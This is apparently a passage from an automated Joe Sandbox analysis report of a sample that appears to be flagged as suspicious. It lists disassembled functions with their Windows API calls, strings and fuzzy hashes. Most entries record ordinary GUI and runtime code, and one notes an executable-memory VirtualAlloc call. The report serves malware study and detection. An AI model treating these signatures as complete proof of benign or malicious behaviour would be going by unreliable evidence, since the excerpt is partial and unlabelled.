Instruction ID: f576184b1887e88ed115ed14e80c28c31212d060c6698834955e598b34f57257
Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction Fuzzy Hash: 2E210E70384344BEE721DB38CC8DF997ADE5B04B18F0580A0B648AF6D2CBB5FA549B14

Uniqueness

Uniqueness Score: -1.00%

Function 029D25CA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

The unexpected small block leaks are:, xrefs: 029D27A3
bytes: , xrefs: 029D27F9
, xrefs: 029D28B0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 029D28E5
An unexpected memory leak has occurred. , xrefs: 029D272C
Unexpected Memory Leak, xrefs: 029D295C
7, xrefs: 029D273D

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 624261b16ae4812c0a60a852f9b1c8376e572e21e11ac1affe17876ff287290c
Instruction ID: a8570c0fb3a1d76b1e4008abbe46f040da56cc1fbad740700a728ab3ce2232b1
Opcode Fuzzy Hash: 624261b16ae4812c0a60a852f9b1c8376e572e21e11ac1affe17876ff287290c
Instruction Fuzzy Hash: B471D330E042988FDF21AB2CCC84BD9BAE9EB49714F1080E5E949DB287DB7589C5DF51

Uniqueness

Uniqueness Score: -1.00%

Function 02A0A170 Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 02A0A1AB
MulDiv.KERNEL32(?,?,?), ref: 02A0A1C5
MulDiv.KERNEL32(?,?,?), ref: 02A0A1F3
MulDiv.KERNEL32(?,?,?), ref: 02A0A209
MulDiv.KERNEL32(?,?,?), ref: 02A0A241
MulDiv.KERNEL32(?,?,?), ref: 02A0A259

Part of subcall function 029F24FC: MulDiv.KERNEL32(00000000,00000048,?), ref: 029F250D

MulDiv.KERNEL32(?), ref: 02A0A2B0
MulDiv.KERNEL32(?), ref: 02A0A2DA
MulDiv.KERNEL32(00000000), ref: 02A0A300

Part of subcall function 029F2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 029F2525

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277b0248ad7e4b5cab525bc8e0c92c1d3a78081a182e4f184a9beee4dc6d2d2d
Instruction ID: b5327027ea430d8beb2b5db6a363401351153c4ac7f802b3b342a81decf3baed
Opcode Fuzzy Hash: 277b0248ad7e4b5cab525bc8e0c92c1d3a78081a182e4f184a9beee4dc6d2d2d
Instruction Fuzzy Hash: C7512E75648750AFC320DB69D8C4B6AB7FDAF49704F04881DAAD6C7292CB36E844CB21

Uniqueness

Uniqueness Score: -1.00%

Function 02A22A94 Relevance: 13.6, APIs: 9, Instructions: 132windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 029EE97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 029EE99A

GetClassInfoA.USER32(029D0000,02A22730,?), ref: 02A22AF3
RegisterClassA.USER32(02A3B650), ref: 02A22B0B

Part of subcall function 029D669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 029D66CE

SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 02A22BA7
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 02A22BC9
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 02A22BDC
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22BE7
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22BF6
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22C03
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02A199E0), ref: 02A22C1A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: 4f32a3717af56b43678262a56d1df8ca4cd770c46af9a99c067370d62db37fd4
Instruction ID: a2a8fbb63df99fa2b4c873a0b42f040a9cded0d13d4bcb1d4e2af54e7b492060
Opcode Fuzzy Hash: 4f32a3717af56b43678262a56d1df8ca4cd770c46af9a99c067370d62db37fd4
Instruction Fuzzy Hash: 52416E70A40240AFEB10EFB8DC85FA633AEAB45704F409961FE40DB292DF75E8549F24

Uniqueness

Uniqueness Score: -1.00%

Function 02A0B0F4 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02A0B12B
GetDCEx.USER32(?,00000000,00000402), ref: 02A0B13E
SelectObject.GDI32(?,00000000), ref: 02A0B161
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 02A0B187
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 02A0B1A9
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 02A0B1C8
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 02A0B1E2
SelectObject.GDI32(?,?), ref: 02A0B1EF
ReleaseDC.USER32(?,?), ref: 02A0B209

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: b3e44c699bf85223c26e7b07c490003794e9e9027a344135f2ce5dd26f8fb7ec
Instruction ID: 4175fedfcb4631a9582a491c396d607c89eadb72795d25236651961cbd7d387b
Opcode Fuzzy Hash: b3e44c699bf85223c26e7b07c490003794e9e9027a344135f2ce5dd26f8fb7ec
Instruction Fuzzy Hash: 9131F5B6A00219AFDB40DEEDDD89EEFBBBDFF49704B008465B504E7240D675AD048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 029DCFCC Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,029DD297,?,?,00000000,00000000), ref: 029DD002

Part of subcall function 029DB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2

Strings

m/d/yy, xrefs: 029DD0D1
:mm:ss, xrefs: 029DD252
AMPM, xrefs: 029DD216
:mm, xrefs: 029DD235
AMPM , xrefs: 029DD225
mmmm d, yyyy, xrefs: 029DD0FE

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 999e11c65f1ca82d1ec6763b654ec0ab971ecbfd451082e5c0b5f32a7aa36174
Instruction ID: 686fbd2bfb6767f640f3c25d613182881018e11b7562373d261fdc7560ebf0a5
Opcode Fuzzy Hash: 999e11c65f1ca82d1ec6763b654ec0ab971ecbfd451082e5c0b5f32a7aa36174
Instruction Fuzzy Hash: 4A611F35B402499BDB00EBE8D890B9F77BBEBC9304F55D835E101AB645CB34D90ABB61

Uniqueness

Uniqueness Score: -1.00%

Function 02A0E58C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,?,?), ref: 02A0E650
UnregisterClassA.USER32(?,?), ref: 02A0E678
RegisterClassA.USER32(?), ref: 02A0E68E
GetWindowLongA.USER32(00000000,000000F0), ref: 02A0E6CA
GetWindowLongA.USER32(00000000,000000F4), ref: 02A0E6DF
SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 02A0E6F2

Strings

@, xrefs: 02A0E5C5

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @
API String ID: 717780171-2766056989
Opcode ID: 3ee2fb76e86823190d5088681ed9c63e02e46b2593e830fb0d3837634192bcc1
Instruction ID: fda7fd44990db133a1e602608c39fff4a7c993fdacd2d251b697a0276e9eebbc
Opcode Fuzzy Hash: 3ee2fb76e86823190d5088681ed9c63e02e46b2593e830fb0d3837634192bcc1
Instruction Fuzzy Hash: 49518030A003548FEB20EBA8DDC4BDEB7EAAF45308F4089A9E555E72D1DB30A945DF10

Uniqueness

Uniqueness Score: -1.00%

Function 029FAFD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 029FB001
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 029FB028
GetSystemMetrics.USER32(00000000), ref: 029FB03D
GetSystemMetrics.USER32(00000001), ref: 029FB048
lstrcpyA.KERNEL32(?,DISPLAY), ref: 029FB072

Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23

Strings

DISPLAY, xrefs: 029FB069
GetMonitorInfo, xrefs: 029FAFE8

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 84f3bcb1f5dd06b4aedb5ce2b57e4359ffe2ce35a88eb7937d782a1381e130b0
Instruction ID: 9f2971955cdcdb68c04040bcd87105d1eb28d77570c5d02af3ea414ef5d3f1bb
Opcode Fuzzy Hash: 84f3bcb1f5dd06b4aedb5ce2b57e4359ffe2ce35a88eb7937d782a1381e130b0
Instruction Fuzzy Hash: B9113332A40701AFD3A0CF64D8487A7B7F9FB08314F044929EE6597640DBB1E414CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 029D4608 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?,02A697C8,?,?,02A3A7AC,029D68FD,02A39751), ref: 029D4641
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?,02A697C8,?,?,02A3A7AC,029D68FD,02A39751), ref: 029D4647
GetStdHandle.KERNEL32(000000F5,029D4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?,02A697C8), ref: 029D465C
WriteFile.KERNEL32(00000000,000000F5,029D4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029D46CF,?,?), ref: 029D4662
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029D4680

Strings

Error, xrefs: 029D4674
Runtime error at 00000000, xrefs: 029D463A, 029D4679

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: f1021ccc4bc052a18d7e2771d42fc6a8d03cb253657e211fc72bda996077f9b4
Instruction ID: 8e03337de39f34fc7bf04fb823c8857d4b338f9002855007d53aaf61733c97b6
Opcode Fuzzy Hash: f1021ccc4bc052a18d7e2771d42fc6a8d03cb253657e211fc72bda996077f9b4
Instruction Fuzzy Hash: C1F02456A90380B4FB20A360AC5DF99635C9385F28F54DB04F3A5D80C28FB084C5AF22

Uniqueness

Uniqueness Score: -1.00%

Function 02A25ED0 Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON

Download Yara Rule

APIs

ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 02A25F2F
ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 02A25FD0
SetTextColor.GDI32(00000000,00FFFFFF), ref: 02A2601D
SetBkColor.GDI32(00000000,00000000), ref: 02A26025
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 02A2604A

Part of subcall function 02A25EA8: ImageList_GetBkColor.COMCTL32(00000000,?,02A25F09,00000000,?), ref: 02A25EBE

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ColorImageList_$Draw$Text
String ID:
API String ID: 2027629008-0
Opcode ID: 9618c621c1208eab8cff48776d25388c460c60d9bc86d5a04521d520bd902ec7
Instruction ID: bbf83a9395d711bf3399132c89881986b8b0642b8e2092ee4ece75f90191317a
Opcode Fuzzy Hash: 9618c621c1208eab8cff48776d25388c460c60d9bc86d5a04521d520bd902ec7
Instruction Fuzzy Hash: 0A511471B40214ABDB94EF6CCDC1FAE37AEAF89710F500160FA14EB285CA74EC459B65

Uniqueness

Uniqueness Score: -1.00%

Function 02A206A4 Relevance: 12.2, APIs: 8, Instructions: 154windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 02A20715
GetCapture.USER32 ref: 02A20724
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 02A2072A
ReleaseCapture.USER32 ref: 02A2072F
GetActiveWindow.USER32 ref: 02A20780
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 02A20816
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 02A20883
GetActiveWindow.USER32 ref: 02A20892

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 0bc1f82dff31df04fcfb418306f4dee6a3dc58ea88933f8fb6e86c61bc7dcf17
Instruction ID: 88e2628341f6f186d3008cdbc5ed1419d575b4c0224ffab384870c8418c1213e
Opcode Fuzzy Hash: 0bc1f82dff31df04fcfb418306f4dee6a3dc58ea88933f8fb6e86c61bc7dcf17
Instruction Fuzzy Hash: BC515C30A40244EFEB11EFA8CA85BAEB7F6EF55700F1584A5E404AB661DB74AE44DF40

Uniqueness

Uniqueness Score: -1.00%

Function 02A0FD5C Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 02A0FD79

Part of subcall function 02A08B74: GetWindowOrgEx.GDI32(00000000), ref: 02A08B82
Part of subcall function 02A08B74: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 02A08B98

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02A0FDB2
GetWindowLongA.USER32(00000000,000000EC), ref: 02A0FDC6
GetWindowLongA.USER32(00000000,000000F0), ref: 02A0FDE7
SetRect.USER32(?,00000000,00000000,?,?), ref: 02A0FE17
DrawEdge.USER32(?,?,00000000,00000000), ref: 02A0FE26
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02A0FE4F
RestoreDC.GDI32(?,?), ref: 02A0FECE

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: dcade169b1d8525b4a8200cfcb1d732839c1cf79a3260cdee00ce02c665afb5f
Instruction ID: 6d45bbb43bbffd037ae81cd417f40fa5fb3edb044d72434b2ad98c83b1355cd9
Opcode Fuzzy Hash: dcade169b1d8525b4a8200cfcb1d732839c1cf79a3260cdee00ce02c665afb5f
Instruction Fuzzy Hash: A741FA75A00208AFDB10DBE8D9C1F9EB7BAEF48704F1181A1B604E7691CB34AE41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02A23BBC Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 02A23BE2
IsWindowUnicode.USER32(00000000), ref: 02A23C25
SendMessageW.USER32(00000000,-0000BBEE,211367A0,?), ref: 02A23C40
SendMessageA.USER32(00000000,-0000BBEE,211367A0,?), ref: 02A23C5F
GetWindowThreadProcessId.USER32(00000000), ref: 02A23C6E
GetWindowThreadProcessId.USER32(?,?), ref: 02A23C7C
SendMessageA.USER32(00000000,-0000BBEE,211367A0,?), ref: 02A23C9C

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
Instruction ID: 22f1bd30d26911bd9bd63581eb8b3ee9126d85e20f025289e875c406154cfa53
Opcode Fuzzy Hash: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
Instruction Fuzzy Hash: 402191712042586FDA60FBADCD80F67B3DDEF46214B1094B5F959C3641DF18F8888B20

Uniqueness

Uniqueness Score: -1.00%

Function 029F3A48 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 029F3A76
GetDeviceCaps.GDI32(?,00000068), ref: 029F3A92
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 029F3AB1
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 029F3AD5
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 029F3AF3
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 029F3B07
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 029F3B27
ReleaseDC.USER32(00000000,?), ref: 029F3B3F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: baec8cfc804772ab78515fad128278222b7ac79bb48edaa223326ccd3ea67f3f
Instruction ID: 1a39741a2ab509cba85bd53e975822c4bcb39dde4d22c3375b7918e75ba44d6d
Opcode Fuzzy Hash: baec8cfc804772ab78515fad128278222b7ac79bb48edaa223326ccd3ea67f3f
Instruction Fuzzy Hash: 5D21A1B1A00208BEEB50EBA5DD84FAEB3BCEB88704F504495F704E7180D775AE409B28

Uniqueness

Uniqueness Score: -1.00%

Function 029FF99C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 177windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,029FFBED), ref: 029FFA38
InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 029FFB41

Part of subcall function 029FFEA0: CreatePopupMenu.USER32 ref: 029FFEBB

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 029FFBCA

Part of subcall function 029FFEA0: CreateMenu.USER32 ref: 029FFEC5

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 029FFBB1

Strings

,, xrefs: 029FFA4C
?, xrefs: 029FFA53

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: dc0a640e3bc52e98391c6214dfec08ebdf79ef214972e106399b2dd6ee37e680
Instruction ID: 8c2128c1e0445b9c77a6a7222dac61eb703e9d7b559049b27f38002804d1139b
Opcode Fuzzy Hash: dc0a640e3bc52e98391c6214dfec08ebdf79ef214972e106399b2dd6ee37e680
Instruction Fuzzy Hash: 35613430E042549FDBD0EFA8D880AAE77FAAF46300B4448A5EA40E76D9E735D915DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02A13708 Relevance: 10.7, APIs: 7, Instructions: 162COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,02A138EC), ref: 02A137ED
GetTickCount.KERNEL32 ref: 02A137F2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 02A13836
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 02A1384E
AnimateWindow.USER32(00000000,00000064,?), ref: 02A13893
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,02A138EC), ref: 02A138B6

Part of subcall function 02A16EC8: GetCursorPos.USER32(?), ref: 02A16ECC

GetTickCount.KERNEL32 ref: 02A138D3

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 91f56b8afb65d42316802f5a4262722d570de88f96dddfa4c68e479430946a95
Instruction ID: 97ffdb7d4edd758fa4babe454c4d2910770ce598649a221ed3515190fb2901fb
Opcode Fuzzy Hash: 91f56b8afb65d42316802f5a4262722d570de88f96dddfa4c68e479430946a95
Instruction Fuzzy Hash: FE515D74A40205EFEB10DFA8CA85AAEB7F6EF44314F2085A0E504EB250DB70EE45DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A240FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02A254A8: GetActiveWindow.USER32 ref: 02A254CF
Part of subcall function 02A254A8: GetLastActivePopup.USER32(?), ref: 02A254E1

GetWindowRect.USER32(?,?), ref: 02A2417E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 02A241B6
MessageBoxA.USER32(00000000,?,?,?), ref: 02A241F5
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,02A2426B), ref: 02A24245
SetActiveWindow.USER32(00000000,02A2426B), ref: 02A24256

Strings

(, xrefs: 02A2415B

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$Active$LastMessagePopupRect
String ID: (
API String ID: 3456420849-3887548279
Opcode ID: 3aae614af262af35c5a02a92f2142531e1f2dc6eff0cbb2fb5699dfebaccaf0a
